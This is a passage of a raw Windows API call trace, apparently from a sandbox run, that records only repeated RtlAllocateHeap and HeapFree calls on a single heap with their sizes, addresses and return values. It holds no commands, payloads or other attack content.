returned 1 [0201.569] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.569] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.570] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.570] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.570] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.570] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.570] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.570] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.570] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.570] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.570] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.570] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.570] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.570] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.570] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.570] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.570] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.570] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0201.570] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.570] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.570] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.570] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.570] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b65058 [0201.570] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.570] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.571] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.571] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.571] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.571] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.571] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.571] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.571] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0201.571] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.571] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.571] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.571] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0201.571] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.571] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.571] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.571] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0201.571] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.571] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.571] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.571] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.571] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.571] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.571] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.571] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.571] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.571] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.572] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.572] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0201.572] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.572] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.572] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.572] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0201.572] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.572] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.572] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.572] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.572] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.572] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.572] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.572] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.572] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.572] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.572] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.572] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.572] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.572] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.572] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.572] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.572] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.572] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.572] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.573] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.573] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.573] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.573] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.573] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b25070 [0201.573] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0201.573] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.573] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.573] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.573] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.573] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.573] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.573] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.573] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0201.573] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.573] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.573] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.573] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.573] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.573] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.573] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.573] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.573] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.573] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b65058 [0201.573] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.574] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.574] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.574] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.574] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0201.574] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.574] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.574] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.574] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0201.574] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.574] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.574] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.574] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.574] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.574] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.574] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.574] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.574] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.574] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.574] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.574] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.574] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0201.574] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.574] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.574] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.574] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.575] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0201.575] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.575] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.575] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.575] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0201.575] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.575] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.575] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.575] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.575] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.575] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.575] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.575] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.575] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.575] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.575] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.575] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.575] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.575] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.575] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.575] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.575] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.575] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.575] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.575] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.576] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.576] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.576] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.576] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.576] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.576] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.576] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.576] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.576] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.576] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.576] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.576] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b25070 [0201.576] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0201.576] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0201.576] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.576] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.576] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.576] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.576] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.576] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.576] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.576] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0201.576] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.576] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.576] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.576] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0201.577] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.577] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.577] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.577] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.577] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.577] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.577] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.577] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.577] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.577] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.577] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.577] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.577] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0201.577] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.577] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.577] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.577] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.577] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0201.577] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.577] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.577] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.577] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0201.577] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.577] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.577] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.577] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.578] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.578] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.578] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.578] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.578] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.578] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.578] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.578] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.578] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.578] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.578] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.578] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.578] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.578] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.578] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.578] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.578] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.578] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.578] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.578] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.578] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.578] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.578] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.578] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.578] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.579] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.579] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.579] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b25070 [0201.579] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0201.579] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0201.579] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.579] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.579] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.579] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.579] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.579] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.579] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.579] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0201.579] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.579] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | 